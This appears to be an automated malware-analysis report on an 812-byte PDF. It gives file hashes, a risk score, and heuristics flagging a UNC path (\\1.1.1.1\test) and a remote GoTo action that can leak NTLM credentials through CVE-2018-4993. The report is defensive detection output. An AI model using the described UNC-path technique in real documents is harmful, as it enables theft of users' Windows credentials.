Malicious PDF — malware analysis report

Static analysis result for SHA-256 915721c9e7e18f5f…

MALICIOUS

PDF

812 B First seen: 2020-12-25
MD5: 9325f0e750240bffaf36aaef830ce59a SHA-1: 78aefc378283737199b63e95af846a4d4d9a299f SHA-256: 915721c9e7e18f5f3aa900f5f458f9a68fdac07580bc11e2157e9c8349bb2979
82 Risk Score

Machine Learning

  • Nyx PDF Classifier clean score 0.1047

Heuristics 3

  • UNC path in PDF — possible NTLM credential theft (CVE-2018-4993/CVE-2019-7089) high CVE likely CVE_2018_4993
    PDF contains a UNC path (\\server\share) alongside action triggers — when a vulnerable viewer resolves this path, Windows may send NTLM credentials to the remote host as the matching PDF action is processed
  • Remote GoTo action high PDF_GOTO_REMOTE
    PDF references an external document via GoToR/GoToE whose target is a URL, UNC path, or executable
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL \\1.1.1.1\test In PDF document text

Open this report in the interactive analyzer, or submit your own file for analysis.